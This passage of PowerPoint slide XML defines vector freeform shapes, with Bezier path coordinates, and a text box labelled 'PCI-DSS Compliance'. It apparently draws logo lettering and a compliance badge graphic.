                    <a:gd name="T9" fmla="*/ 72 h 126"/>
                    <a:gd name="T10" fmla="*/ 269 w 388"/>
                    <a:gd name="T11" fmla="*/ 25 h 126"/>
                    <a:gd name="T12" fmla="*/ 249 w 388"/>
                    <a:gd name="T13" fmla="*/ 44 h 126"/>
                    <a:gd name="T14" fmla="*/ 249 w 388"/>
                    <a:gd name="T15" fmla="*/ 52 h 126"/>
                    <a:gd name="T16" fmla="*/ 269 w 388"/>
                    <a:gd name="T17" fmla="*/ 72 h 126"/>
                    <a:gd name="T18" fmla="*/ 209 w 388"/>
                    <a:gd name="T19" fmla="*/ 25 h 126"/>
                    <a:gd name="T20" fmla="*/ 217 w 388"/>
                    <a:gd name="T21" fmla="*/ 34 h 126"/>
                    <a:gd name="T22" fmla="*/ 233 w 388"/>
                    <a:gd name="T23" fmla="*/ 53 h 126"/>
                    <a:gd name="T24" fmla="*/ 209 w 388"/>
                    <a:gd name="T25" fmla="*/ 72 h 126"/>
                    <a:gd name="T26" fmla="*/ 202 w 388"/>
                    <a:gd name="T27" fmla="*/ 25 h 126"/>
                    <a:gd name="T28" fmla="*/ 193 w 388"/>
                    <a:gd name="T29" fmla="*/ 25 h 126"/>
                    <a:gd name="T30" fmla="*/ 189 w 388"/>
                    <a:gd name="T31" fmla="*/ 34 h 126"/>
                    <a:gd name="T32" fmla="*/ 170 w 388"/>
                    <a:gd name="T33" fmla="*/ 72 h 126"/>
                    <a:gd name="T34" fmla="*/ 158 w 388"/>
                    <a:gd name="T35" fmla="*/ 25 h 126"/>
                    <a:gd name="T36" fmla="*/ 149 w 388"/>
                    <a:gd name="T37" fmla="*/ 26 h 126"/>
                    <a:gd name="T38" fmla="*/ 156 w 388"/>
                    <a:gd name="T39" fmla="*/ 38 h 126"/>
                    <a:gd name="T40" fmla="*/ 150 w 388"/>
                    <a:gd name="T41" fmla="*/ 50 h 126"/>
                    <a:gd name="T42" fmla="*/ 155 w 388"/>
                    <a:gd name="T43" fmla="*/ 57 h 126"/>
                    <a:gd name="T44" fmla="*/ 155 w 388"/>
                    <a:gd name="T45" fmla="*/ 66 h 126"/>
                    <a:gd name="T46" fmla="*/ 148 w 388"/>
                    <a:gd name="T47" fmla="*/ 72 h 126"/>
                    <a:gd name="T48" fmla="*/ 147 w 388"/>
                    <a:gd name="T49" fmla="*/ 63 h 126"/>
                    <a:gd name="T50" fmla="*/ 141 w 388"/>
                    <a:gd name="T51" fmla="*/ 54 h 126"/>
                    <a:gd name="T52" fmla="*/ 124 w 388"/>
                    <a:gd name="T53" fmla="*/ 72 h 126"/>
                    <a:gd name="T54" fmla="*/ 118 w 388"/>
                    <a:gd name="T55" fmla="*/ 25 h 126"/>
                    <a:gd name="T56" fmla="*/ 98 w 388"/>
                    <a:gd name="T57" fmla="*/ 44 h 126"/>
                    <a:gd name="T58" fmla="*/ 98 w 388"/>
                    <a:gd name="T59" fmla="*/ 52 h 126"/>
                    <a:gd name="T60" fmla="*/ 119 w 388"/>
                    <a:gd name="T61" fmla="*/ 72 h 126"/>
                    <a:gd name="T62" fmla="*/ 50 w 388"/>
                    <a:gd name="T63" fmla="*/ 39 h 126"/>
                    <a:gd name="T64" fmla="*/ 68 w 388"/>
                    <a:gd name="T65" fmla="*/ 24 h 126"/>
                    <a:gd name="T66" fmla="*/ 82 w 388"/>
                    <a:gd name="T67" fmla="*/ 34 h 126"/>
                    <a:gd name="T68" fmla="*/ 75 w 388"/>
                    <a:gd name="T69" fmla="*/ 38 h 126"/>
                    <a:gd name="T70" fmla="*/ 68 w 388"/>
                    <a:gd name="T71" fmla="*/ 33 h 126"/>
                    <a:gd name="T72" fmla="*/ 58 w 388"/>
                    <a:gd name="T73" fmla="*/ 43 h 126"/>
                    <a:gd name="T74" fmla="*/ 60 w 388"/>
                    <a:gd name="T75" fmla="*/ 59 h 126"/>
                    <a:gd name="T76" fmla="*/ 74 w 388"/>
                    <a:gd name="T77" fmla="*/ 61 h 126"/>
                    <a:gd name="T78" fmla="*/ 83 w 388"/>
                    <a:gd name="T79" fmla="*/ 62 h 126"/>
                    <a:gd name="T80" fmla="*/ 68 w 388"/>
                    <a:gd name="T81" fmla="*/ 73 h 126"/>
                    <a:gd name="T82" fmla="*/ 50 w 388"/>
                    <a:gd name="T83" fmla="*/ 58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88" h="126">
                      <a:moveTo>
                        <a:pt x="163" y="126"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="306" y="126"/>
                        <a:pt x="388" y="0"/>
                        <a:pt x="38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20" y="126"/>
                        <a:pt x="163" y="126"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="275" y="25"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="291" y="25"/>
                        <a:pt x="291" y="25"/>
                        <a:pt x="291" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="293" y="25"/>
                        <a:pt x="295" y="26"/>
                        <a:pt x="298" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="300" y="28"/>
                        <a:pt x="301" y="29"/>
                        <a:pt x="303" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="305" y="33"/>
                        <a:pt x="306" y="35"/>
                        <a:pt x="307" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="307" y="41"/>
                        <a:pt x="308" y="44"/>
                        <a:pt x="308" y="48"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="308" y="52"/>
                        <a:pt x="308" y="55"/>
                        <a:pt x="307" y="58"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="306" y="60"/>
                        <a:pt x="305" y="63"/>
                        <a:pt x="304" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="302" y="67"/>
                        <a:pt x="300" y="69"/>
                        <a:pt x="298" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="296" y="71"/>
                        <a:pt x="294" y="72"/>
                        <a:pt x="291" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="275" y="72"/>
                        <a:pt x="275" y="72"/>
                        <a:pt x="275" y="72"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="275" y="25"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="240" y="25"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="269" y="25"/>
                        <a:pt x="269" y="25"/>
                        <a:pt x="269" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="269" y="34"/>
                        <a:pt x="269" y="34"/>
                        <a:pt x="269" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="249" y="34"/>
                        <a:pt x="249" y="34"/>
                        <a:pt x="249" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="249" y="44"/>
                        <a:pt x="249" y="44"/>
                        <a:pt x="249" y="44"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="267" y="44"/>
                        <a:pt x="267" y="44"/>
                        <a:pt x="267" y="44"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="267" y="52"/>
                        <a:pt x="267" y="52"/>
                        <a:pt x="267" y="52"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="249" y="52"/>
                        <a:pt x="249" y="52"/>
                        <a:pt x="249" y="52"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="249" y="63"/>
                        <a:pt x="249" y="63"/>
                        <a:pt x="249" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="269" y="63"/>
                        <a:pt x="269" y="63"/>
                        <a:pt x="269" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="269" y="72"/>
                        <a:pt x="269" y="72"/>
                        <a:pt x="269" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="240" y="72"/>
                        <a:pt x="240" y="72"/>
                        <a:pt x="240" y="72"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="240" y="25"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="209" y="25"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="236" y="25"/>
                        <a:pt x="236" y="25"/>
                        <a:pt x="236" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="236" y="34"/>
                        <a:pt x="236" y="34"/>
                        <a:pt x="236" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="34"/>
                        <a:pt x="217" y="34"/>
                        <a:pt x="217" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="45"/>
                        <a:pt x="217" y="45"/>
                        <a:pt x="217" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="233" y="45"/>
                        <a:pt x="233" y="45"/>
                        <a:pt x="233" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="233" y="53"/>
                        <a:pt x="233" y="53"/>
                        <a:pt x="233" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="53"/>
                        <a:pt x="217" y="53"/>
                        <a:pt x="217" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="217" y="72"/>
                        <a:pt x="217" y="72"/>
                        <a:pt x="217" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="209" y="72"/>
                        <a:pt x="209" y="72"/>
                        <a:pt x="209" y="72"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="209" y="25"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="193" y="25"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="25"/>
                        <a:pt x="202" y="25"/>
                        <a:pt x="202" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="202" y="72"/>
                        <a:pt x="202" y="72"/>
                        <a:pt x="202" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="193" y="72"/>
                        <a:pt x="193" y="72"/>
                        <a:pt x="193" y="72"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="193" y="25"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="158" y="25"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="189" y="25"/>
                        <a:pt x="189" y="25"/>
                        <a:pt x="189" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="189" y="34"/>
                        <a:pt x="189" y="34"/>
                        <a:pt x="189" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="34"/>
                        <a:pt x="178" y="34"/>
                        <a:pt x="178" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="178" y="72"/>
                        <a:pt x="178" y="72"/>
                        <a:pt x="178" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="72"/>
                        <a:pt x="170" y="72"/>
                        <a:pt x="170" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="34"/>
                        <a:pt x="170" y="34"/>
                        <a:pt x="170" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="158" y="34"/>
                        <a:pt x="158" y="34"/>
                        <a:pt x="158" y="34"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="158" y="25"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="124" y="25"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="144" y="25"/>
                        <a:pt x="144" y="25"/>
                        <a:pt x="144" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="146" y="25"/>
                        <a:pt x="148" y="26"/>
                        <a:pt x="149" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="27"/>
                        <a:pt x="152" y="28"/>
                        <a:pt x="153" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="154" y="30"/>
                        <a:pt x="154" y="32"/>
                        <a:pt x="155" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="155" y="35"/>
                        <a:pt x="156" y="36"/>
                        <a:pt x="156" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="41"/>
                        <a:pt x="155" y="43"/>
                        <a:pt x="154" y="45"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="153" y="47"/>
                        <a:pt x="152" y="49"/>
                        <a:pt x="150" y="50"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="150" y="50"/>
                        <a:pt x="150" y="50"/>
                        <a:pt x="150" y="50"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="151" y="50"/>
                        <a:pt x="151" y="51"/>
                        <a:pt x="152" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="153" y="52"/>
                        <a:pt x="153" y="53"/>
                        <a:pt x="154" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="154" y="55"/>
                        <a:pt x="154" y="56"/>
                        <a:pt x="155" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="155" y="58"/>
                        <a:pt x="155" y="60"/>
                        <a:pt x="155" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="155" y="61"/>
                        <a:pt x="155" y="62"/>
                        <a:pt x="155" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="155" y="64"/>
                        <a:pt x="155" y="65"/>
                        <a:pt x="155" y="66"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="155" y="67"/>
                        <a:pt x="156" y="68"/>
                        <a:pt x="156" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="70"/>
                        <a:pt x="156" y="71"/>
                        <a:pt x="157" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="72"/>
                        <a:pt x="148" y="72"/>
                        <a:pt x="148" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="71"/>
                        <a:pt x="148" y="70"/>
                        <a:pt x="148" y="69"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="68"/>
                        <a:pt x="148" y="67"/>
                        <a:pt x="147" y="66"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="147" y="65"/>
                        <a:pt x="147" y="64"/>
                        <a:pt x="147" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="147" y="62"/>
                        <a:pt x="147" y="61"/>
                        <a:pt x="147" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="147" y="58"/>
                        <a:pt x="146" y="56"/>
                        <a:pt x="145" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="144" y="54"/>
                        <a:pt x="143" y="54"/>
                        <a:pt x="141" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="132" y="54"/>
                        <a:pt x="132" y="54"/>
                        <a:pt x="132" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="132" y="72"/>
                        <a:pt x="132" y="72"/>
                        <a:pt x="132" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="124" y="72"/>
                        <a:pt x="124" y="72"/>
                        <a:pt x="124" y="72"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="124" y="25"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="90" y="25"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="118" y="25"/>
                        <a:pt x="118" y="25"/>
                        <a:pt x="118" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="118" y="34"/>
                        <a:pt x="118" y="34"/>
                        <a:pt x="118" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="34"/>
                        <a:pt x="98" y="34"/>
                        <a:pt x="98" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="44"/>
                        <a:pt x="98" y="44"/>
                        <a:pt x="98" y="44"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="117" y="44"/>
                        <a:pt x="117" y="44"/>
                        <a:pt x="117" y="44"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="117" y="52"/>
                        <a:pt x="117" y="52"/>
                        <a:pt x="117" y="52"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="52"/>
                        <a:pt x="98" y="52"/>
                        <a:pt x="98" y="52"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="98" y="63"/>
                        <a:pt x="98" y="63"/>
                        <a:pt x="98" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="119" y="63"/>
                        <a:pt x="119" y="63"/>
                        <a:pt x="119" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="119" y="72"/>
                        <a:pt x="119" y="72"/>
                        <a:pt x="119" y="72"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="90" y="72"/>
                        <a:pt x="90" y="72"/>
                        <a:pt x="90" y="72"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="90" y="25"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="50" y="39"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="36"/>
                        <a:pt x="53" y="34"/>
                        <a:pt x="54" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="29"/>
                        <a:pt x="58" y="27"/>
                        <a:pt x="60" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="25"/>
                        <a:pt x="65" y="24"/>
                        <a:pt x="68" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="70" y="24"/>
                        <a:pt x="72" y="25"/>
                        <a:pt x="74" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="26"/>
                        <a:pt x="77" y="27"/>
                        <a:pt x="79" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="80" y="30"/>
                        <a:pt x="81" y="32"/>
                        <a:pt x="82" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="36"/>
                        <a:pt x="84" y="38"/>
                        <a:pt x="84" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="76" y="41"/>
                        <a:pt x="76" y="41"/>
                        <a:pt x="76" y="41"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="76" y="40"/>
                        <a:pt x="76" y="39"/>
                        <a:pt x="75" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="37"/>
                        <a:pt x="74" y="36"/>
                        <a:pt x="73" y="35"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="34"/>
                        <a:pt x="72" y="34"/>
                        <a:pt x="71" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="70" y="33"/>
                        <a:pt x="69" y="33"/>
                        <a:pt x="68" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="33"/>
                        <a:pt x="64" y="33"/>
                        <a:pt x="63" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="35"/>
                        <a:pt x="61" y="36"/>
                        <a:pt x="60" y="38"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="59" y="39"/>
                        <a:pt x="58" y="41"/>
                        <a:pt x="58" y="43"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="45"/>
                        <a:pt x="58" y="47"/>
                        <a:pt x="58" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="51"/>
                        <a:pt x="58" y="53"/>
                        <a:pt x="58" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="56"/>
                        <a:pt x="59" y="58"/>
                        <a:pt x="60" y="59"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="61" y="61"/>
                        <a:pt x="62" y="62"/>
                        <a:pt x="63" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="64" y="64"/>
                        <a:pt x="66" y="64"/>
                        <a:pt x="68" y="64"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="70" y="64"/>
                        <a:pt x="72" y="63"/>
                        <a:pt x="74" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="59"/>
                        <a:pt x="76" y="57"/>
                        <a:pt x="76" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="84" y="54"/>
                        <a:pt x="84" y="54"/>
                        <a:pt x="84" y="54"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="84" y="57"/>
                        <a:pt x="84" y="59"/>
                        <a:pt x="83" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="64"/>
                        <a:pt x="81" y="66"/>
                        <a:pt x="79" y="68"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="78" y="69"/>
                        <a:pt x="76" y="71"/>
                        <a:pt x="74" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="72" y="72"/>
                        <a:pt x="70" y="73"/>
                        <a:pt x="68" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="65" y="73"/>
                        <a:pt x="62" y="72"/>
                        <a:pt x="60" y="71"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="70"/>
                        <a:pt x="56" y="68"/>
                        <a:pt x="54" y="66"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="53" y="64"/>
                        <a:pt x="51" y="61"/>
                        <a:pt x="50" y="58"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="50" y="55"/>
                        <a:pt x="49" y="52"/>
                        <a:pt x="49" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="49" y="45"/>
                        <a:pt x="50" y="42"/>
                        <a:pt x="50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</p:grp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44C53583-E907-A347-9097-668B8FE1A855}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7826496" y="5706231"/>
              <a:ext cx="578195" cy="581588"/>
              <a:chOff x="5784894" y="5706231"/>
              <a:chExt cx="578195" cy="581588"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="183" name="Shape 113">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACC43DF0-C57E-9C4A-94C0-847917583DB2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5857540" y="6103153"/>
                <a:ext cx="432903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PCI-DSS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Compliance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  <a:sym typeface="Arial"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="184" name="그룹 23">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2487DF17-7E43-9147-9BD5-87CCFF2566F6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5784894" y="5706231"/>
                <a:ext cx="578195" cy="226424"/>
                <a:chOff x="7762812" y="23629961"/>
                <a:chExt cx="3668713" cy="143668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185" name="Freeform 47">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ED24031-9EF3-2D4F-9B60-E42F4771D6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210737" y="24376086"/>
                  <a:ext cx="131763" cy="142875"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 16 w 31"/>
                    <a:gd name="T1" fmla="*/ 28 h 34"/>
                    <a:gd name="T2" fmla="*/ 7 w 31"/>
                    <a:gd name="T3" fmla="*/ 17 h 34"/>
                    <a:gd name="T4" fmla="*/ 16 w 31"/>
                    <a:gd name="T5" fmla="*/ 6 h 34"/>
                    <a:gd name="T6" fmla="*/ 23 w 31"/>
                    <a:gd name="T7" fmla="*/ 12 h 34"/>
                    <a:gd name="T8" fmla="*/ 30 w 31"/>
                    <a:gd name="T9" fmla="*/ 12 h 34"/>
                    <a:gd name="T10" fmla="*/ 16 w 31"/>
                    <a:gd name="T11" fmla="*/ 0 h 34"/>
                    <a:gd name="T12" fmla="*/ 0 w 31"/>
                    <a:gd name="T13" fmla="*/ 17 h 34"/>
                    <a:gd name="T14" fmla="*/ 16 w 31"/>
                    <a:gd name="T15" fmla="*/ 34 h 34"/>
                    <a:gd name="T16" fmla="*/ 31 w 31"/>
                    <a:gd name="T17" fmla="*/ 21 h 34"/>
                    <a:gd name="T18" fmla="*/ 24 w 31"/>
                    <a:gd name="T19" fmla="*/ 21 h 34"/>
                    <a:gd name="T20" fmla="*/ 16 w 31"/>
                    <a:gd name="T21" fmla="*/ 28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" h="34">
                      <a:moveTo>
                        <a:pt x="16" y="28"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="28"/>
                        <a:pt x="7" y="22"/>
                        <a:pt x="7" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="11"/>
                        <a:pt x="10" y="6"/>
                        <a:pt x="16" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="6"/>
                        <a:pt x="23" y="8"/>
                        <a:pt x="23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29" y="4"/>
                        <a:pt x="23" y="0"/>
                        <a:pt x="16" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="26"/>
                        <a:pt x="6" y="34"/>
                        <a:pt x="16" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="24" y="34"/>
                        <a:pt x="30" y="29"/>
                        <a:pt x="31" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="24" y="21"/>
                        <a:pt x="24" y="21"/>
                        <a:pt x="24" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="25"/>
                        <a:pt x="21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86" name="Freeform 48">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBC67BD3-1584-0D4F-9CE8-0245657D87D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363137" y="24376086"/>
                  <a:ext cx="136525" cy="142875"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 16 w 32"/>
                    <a:gd name="T1" fmla="*/ 0 h 34"/>
                    <a:gd name="T2" fmla="*/ 0 w 32"/>
                    <a:gd name="T3" fmla="*/ 17 h 34"/>
                    <a:gd name="T4" fmla="*/ 16 w 32"/>
                    <a:gd name="T5" fmla="*/ 34 h 34"/>
                    <a:gd name="T6" fmla="*/ 32 w 32"/>
                    <a:gd name="T7" fmla="*/ 17 h 34"/>
                    <a:gd name="T8" fmla="*/ 16 w 32"/>
                    <a:gd name="T9" fmla="*/ 0 h 34"/>
                    <a:gd name="T10" fmla="*/ 16 w 32"/>
                    <a:gd name="T11" fmla="*/ 28 h 34"/>
